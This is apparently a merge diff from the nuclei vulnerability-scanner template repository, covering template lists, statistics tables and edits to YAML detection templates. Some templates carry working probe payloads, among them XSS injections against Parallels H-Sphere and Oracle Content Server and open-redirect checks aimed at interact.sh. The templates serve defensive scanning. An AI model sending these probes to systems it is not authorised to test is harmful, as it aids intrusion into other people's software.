Merge branch 'master' into patch-31
commit
044920064e
|
@ -1,21 +1,44 @@
|
|||
cves/2022/CVE-2022-41473.yaml
|
||||
default-logins/dataiku/dataiku-default-login.yaml
|
||||
default-logins/processwire-login.yaml
|
||||
exposed-panels/bmc/bmc-discovery-panel.yaml
|
||||
exposed-panels/dataiku-panel.yaml
|
||||
exposed-panels/novnc-login-panel.yaml
|
||||
exposed-panels/opengear-panel.yaml
|
||||
exposed-panels/piwigo-panel.yaml
|
||||
exposed-panels/totemomail-panel.yaml
|
||||
exposures/configs/cakephp-config.yaml
|
||||
exposures/files/travis-ci-disclosure.yaml
|
||||
exposures/tokens/loqate/loqate-api-key.yaml
|
||||
misconfiguration/iot-vdme-simulator.yaml
|
||||
misconfiguration/springboot/springboot-auditevents.yaml
|
||||
misconfiguration/springboot/springboot-features.yaml
|
||||
misconfiguration/springboot/springboot-jolokia.yaml
|
||||
misconfiguration/springboot/springboot-logfile.yaml
|
||||
misconfiguration/springboot/springboot-loggerconfig.yaml
|
||||
ssl/weak-cipher-suites.yaml
|
||||
takeovers/surveysparrow-takeover.yaml
|
||||
technologies/oracle/oracle-atg-commerce.yaml
|
||||
cves/2020/CVE-2020-13121.yaml
|
||||
cves/2020/CVE-2020-21012.yaml
|
||||
cves/2020/CVE-2020-24902.yaml
|
||||
cves/2020/CVE-2020-24903.yaml
|
||||
cves/2020/CVE-2020-29284.yaml
|
||||
cves/2021/CVE-2021-43510.yaml
|
||||
cves/2022/CVE-2022-0349.yaml
|
||||
cves/2022/CVE-2022-1442.yaml
|
||||
cves/2022/CVE-2022-2379.yaml
|
||||
cves/2022/CVE-2022-3484.yaml
|
||||
cves/2022/CVE-2022-3578.yaml
|
||||
cves/2022/CVE-2022-40881.yaml
|
||||
default-logins/tooljet/tooljet-default-login.yaml
|
||||
exposed-panels/apache-jmeter-dashboard.yaml
|
||||
exposed-panels/np-data-cache.yaml
|
||||
exposed-panels/opencpu-panel.yaml
|
||||
exposed-panels/selenium-grid.yaml
|
||||
exposed-panels/tekton-dashboard.yaml
|
||||
exposed-panels/wagtail-cms-detect.yaml
|
||||
exposed-panels/xibocms-login.yaml
|
||||
exposures/files/apache-licenserc.yaml
|
||||
file/keys/github-recovery-code.yaml
|
||||
iot/pqube-power-analyzers.yaml
|
||||
misconfiguration/blackbox-exporter-metrics.yaml
|
||||
misconfiguration/bootstrap-admin-panel-template.yaml
|
||||
misconfiguration/docmosis-tornado-server.yaml
|
||||
misconfiguration/haproxy-exporter-metrics.yaml
|
||||
misconfiguration/installer/tasmota-install.yaml
|
||||
misconfiguration/pcdn-cache-node.yaml
|
||||
misconfiguration/phpmemcached-admin-panel.yaml
|
||||
misconfiguration/tasmota-config-webui.yaml
|
||||
misconfiguration/typo3-debug-mode.yaml
|
||||
misconfiguration/unauth-mercurial.yaml
|
||||
misconfiguration/unauth-selenium-grid-console.yaml
|
||||
network/detection/dotnet-remoting-service-detect.yaml
|
||||
network/detection/esmtp-detect.yaml
|
||||
network/detection/imap-detect.yaml
|
||||
network/detection/pop3-detect.yaml
|
||||
network/detection/telnet-detect.yaml
|
||||
technologies/notion-detect.yaml
|
||||
technologies/secui-waf-detect.yaml
|
||||
technologies/sogo-detect.yaml
|
||||
technologies/tornado-server-login.yaml
|
||||
vulnerabilities/opencpu/opencpu-rce.yaml
|
||||
|
|
|
@ -27,6 +27,7 @@ files:
|
|||
- cves/2007/CVE-2007-5728.yaml
|
||||
- cves/2014/CVE-2014-9608.yaml
|
||||
- cves/2018/CVE-2018-5233.yaml
|
||||
- cves/2019/CVE-2019-14696.yaml
|
||||
- cves/2020/CVE-2020-11930.yaml
|
||||
- cves/2020/CVE-2020-19295.yaml
|
||||
- cves/2020/CVE-2020-2036.yaml
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1487 | daffainfo | 646 | cves | 1466 | info | 1533 | http | 4005 |
|
||||
| panel | 687 | dhiyaneshdk | 622 | exposed-panels | 694 | high | 1071 | file | 77 |
|
||||
| edb | 574 | pikpikcu | 338 | vulnerabilities | 516 | medium | 789 | network | 54 |
|
||||
| lfi | 516 | pdteam | 273 | technologies | 296 | critical | 527 | dns | 17 |
|
||||
| xss | 514 | geeknik | 196 | exposures | 290 | low | 231 | | |
|
||||
| wordpress | 443 | dwisiswant0 | 170 | misconfiguration | 250 | unknown | 16 | | |
|
||||
| exposure | 433 | 0x_akoko | 167 | token-spray | 234 | | | | |
|
||||
| cve2021 | 361 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 340 | ritikchaddha | 139 | default-logins | 106 | | | | |
|
||||
| wp-plugin | 338 | pussycat0x | 137 | file | 77 | | | | |
|
||||
| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 |
|
||||
| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 |
|
||||
| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 |
|
||||
| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 |
|
||||
| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | |
|
||||
| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | |
|
||||
| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | |
|
||||
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
|
||||
| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | |
|
||||
| rce | 343 | princechaddha | 153 | file | 77 | | | | |
|
||||
|
||||
**301 directories, 4386 files**.
|
||||
**312 directories, 4617 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
4184
TEMPLATES-STATS.md
4184
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1487 | daffainfo | 646 | cves | 1466 | info | 1533 | http | 4005 |
|
||||
| panel | 687 | dhiyaneshdk | 622 | exposed-panels | 694 | high | 1071 | file | 77 |
|
||||
| edb | 574 | pikpikcu | 338 | vulnerabilities | 516 | medium | 789 | network | 54 |
|
||||
| lfi | 516 | pdteam | 273 | technologies | 296 | critical | 527 | dns | 17 |
|
||||
| xss | 514 | geeknik | 196 | exposures | 290 | low | 231 | | |
|
||||
| wordpress | 443 | dwisiswant0 | 170 | misconfiguration | 250 | unknown | 16 | | |
|
||||
| exposure | 433 | 0x_akoko | 167 | token-spray | 234 | | | | |
|
||||
| cve2021 | 361 | princechaddha | 151 | workflows | 190 | | | | |
|
||||
| rce | 340 | ritikchaddha | 139 | default-logins | 106 | | | | |
|
||||
| wp-plugin | 338 | pussycat0x | 137 | file | 77 | | | | |
|
||||
| cve | 1526 | dhiyaneshdk | 687 | cves | 1504 | info | 1618 | http | 4218 |
|
||||
| panel | 747 | daffainfo | 659 | exposed-panels | 751 | high | 1135 | file | 77 |
|
||||
| edb | 575 | pikpikcu | 340 | vulnerabilities | 517 | medium | 822 | network | 70 |
|
||||
| xss | 533 | pdteam | 274 | misconfiguration | 338 | critical | 540 | dns | 17 |
|
||||
| exposure | 525 | geeknik | 196 | technologies | 306 | low | 260 | | |
|
||||
| lfi | 518 | dwisiswant0 | 171 | exposures | 300 | unknown | 23 | | |
|
||||
| wordpress | 460 | 0x_akoko | 169 | token-spray | 235 | | | | |
|
||||
| cve2021 | 365 | ritikchaddha | 159 | workflows | 190 | | | | |
|
||||
| wp-plugin | 355 | pussycat0x | 157 | default-logins | 113 | | | | |
|
||||
| rce | 343 | princechaddha | 153 | file | 77 | | | | |
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
id: CNVD-2021-09650
|
||||
|
||||
info:
|
||||
name: Ruijie EWEB Gateway Platform - Remote Command Injection
|
||||
author: daffainfo
|
||||
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
|
||||
author: daffainfo,pikpikcu
|
||||
severity: critical
|
||||
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
|
||||
reference:
|
||||
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
|
||||
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
|
||||
- https://www.ruijienetworks.com
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
|
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2007-2449
|
||||
|
||||
info:
|
||||
name: Apache Tomcat 4.x-7.x - Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: low
|
||||
description: Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which can be used by an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
|
||||
reference:
|
||||
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks
|
||||
- http://tomcat.apache.org/security-6.html
|
||||
- http://tomcat.apache.org/security-4.html
|
||||
- http://tomcat.apache.org/security-5.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: title:"Apache Tomcat"
|
||||
tags: cve,cve2007,apache,misconfig,tomcat,disclosure,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/examples/jsp/snp/snoop.jsp"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Request URI: /examples/jsp/snp/snoop.jsp'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/09/15
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2008-6465
|
||||
|
||||
info:
|
||||
name: Parallels H-Sphere - Cross Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
|
||||
reference:
|
||||
- http://www.xssing.com/index.php?x=3&y=65
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
|
||||
classification:
|
||||
cve-id: CVE-2008-6465
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Parallels H-Sphere
|
||||
tags: cve,cve2008,xss,parallels,h-sphere
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '\" onfocus=alert(document.domain); autofocus'
|
||||
- 'Please enter login name & password'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12085
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1980
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2010-2033
|
||||
|
||||
info:
|
||||
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
|
||||
name: Joomla! Percha Categories Tree 0.6 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2015-4074
|
||||
|
||||
info:
|
||||
name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
|
||||
name: Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2016-10368
|
||||
|
||||
info:
|
||||
name: Opsview Monitor Pro 4.5.x - Open Redirect
|
||||
name: Opsview Monitor Pro - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841 prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
|
||||
Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
|
||||
reference:
|
||||
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
|
||||
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2016-10368
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -36,3 +36,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
# Enhanced by mp on 2022/10/12
|
||||
|
|
|
@ -31,4 +31,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/09
|
||||
# Enhanced by mp on 2022/10/24
|
||||
|
|
|
@ -1,34 +1,47 @@
|
|||
id: CVE-2017-10075
|
||||
|
||||
info:
|
||||
name: Oracle Content Server Cross-Site Scripting
|
||||
name: Oracle Content Server - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: high
|
||||
description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
|
||||
description: |
|
||||
Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
|
||||
reference:
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
|
||||
- http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
||||
cvss-score: 8.2
|
||||
cve-id: CVE-2017-10075
|
||||
metadata:
|
||||
google-dork: inurl:"/cs/idcplg"
|
||||
verified: "true"
|
||||
tags: cve,cve2017,xss,oracle
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
|
||||
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
|
||||
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO"
|
||||
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<svg/onload=alert(document.domain)>"
|
||||
- "ORACLE_QUERY"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(31337)</script>"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/04/12
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2017-11586
|
||||
|
||||
info:
|
||||
name: FineCms < 5.0.9 - Open redirect
|
||||
name: FineCMS <5.0.9 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
|
||||
FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-11586
|
||||
|
@ -37,3 +37,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- 'Refresh:(.*)url=http:\/\/interact\.sh'
|
||||
|
||||
# Enhanced by mp on 2022/10/12
|
||||
|
|
|
@ -4,11 +4,12 @@ info:
|
|||
name: XOOPS Core 2.5.8 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter.
|
||||
description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://github.com/XOOPS/XoopsCore25/issues/523
|
||||
- https://xoops.org
|
||||
- https://www.cvedetails.com/cve/CVE-2017-12138
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12138
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -35,3 +36,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -40,4 +40,4 @@ requests:
|
|||
- "SQLServer"
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 2022/10/06
|
||||
# Enhanced by cs on 2022/10/24
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-1000861
|
||||
cwe-id: CWE-502
|
||||
tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins
|
||||
tags: kev,vulhub,cve,cve2018,rce,jenkins
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Seagate NAS OS 4.3.15.1 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
|
||||
description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.
|
||||
reference:
|
||||
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-12300
|
||||
|
@ -26,3 +26,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2018-12675
|
||||
|
||||
info:
|
||||
name: SV3C HD Camera L-SERIES - Open Redirect
|
||||
name: SV3C HD Camera L Series - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
The SV3C HD Camera (L-SERIES V2.3.4.2103-S50-NTD-B20170508B and V2.3.4.2103-S50-NTD-B20170823B) does not perform origin checks on URLs that the camera's web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint.
|
||||
SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory
|
||||
- https://vuldb.com/?id.125799
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
|
||||
- https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-12675
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.
|
||||
Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa
|
||||
- https://seclists.org/fulldisclosure/2019/Jan/32
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2018-14574
|
||||
|
||||
info:
|
||||
name: Django Open Redirect
|
||||
name: Django - Open Redirect
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect.
|
||||
description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://www.djangoproject.com/weblog/2018/aug/01/security-releases/
|
||||
- https://usn.ubuntu.com/3726-1/
|
||||
|
@ -12,6 +12,7 @@ info:
|
|||
- https://www.debian.org/security/2018/dsa-4264
|
||||
- http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/
|
||||
- https://access.redhat.com/errata/RHSA-2019:0265
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-14574
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -34,3 +35,5 @@ requests:
|
|||
- "Location: https://www.interact.sh"
|
||||
- "Location: http://www.interact.sh"
|
||||
part: header
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2018-16761
|
||||
|
||||
info:
|
||||
name: Eventum v3.3.4 - Open Redirect
|
||||
name: Eventum <3.4.0 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
Eventum before 3.4.0 has an open redirect vulnerability.
|
||||
Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
|
||||
- https://github.com/eventum/eventum/releases/tag/v3.4.0
|
||||
|
@ -29,3 +29,5 @@ requests:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2018-17246
|
|||
|
||||
info:
|
||||
name: Kibana - Local File Inclusion
|
||||
author: princechaddha
|
||||
author: princechaddha,thelicato
|
||||
severity: critical
|
||||
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
|
||||
reference:
|
||||
|
@ -25,19 +25,19 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\"message\":\"An internal server error occurred\""
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "kbn-name"
|
||||
- "application/json"
|
||||
- "kibana"
|
||||
condition: and
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
condition: or
|
||||
case-insensitive: true
|
||||
|
||||
# Enhanced by mp on 2022/05/13
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
|
|
